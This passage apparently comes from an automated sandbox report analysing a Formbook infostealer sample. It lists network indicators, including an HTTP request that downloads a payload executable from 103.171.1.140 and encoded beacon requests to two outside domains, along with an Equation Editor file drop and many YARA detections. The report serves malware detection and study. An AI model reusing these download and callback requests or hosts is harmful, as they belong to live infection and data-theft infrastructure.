          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.484932398.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662313228.0000000001E70000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.500166360.0000000001E70000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469685487.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.531572707.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.oojry.xyz
          Source: global trafficHTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404E07

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exeJump to dropped file
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
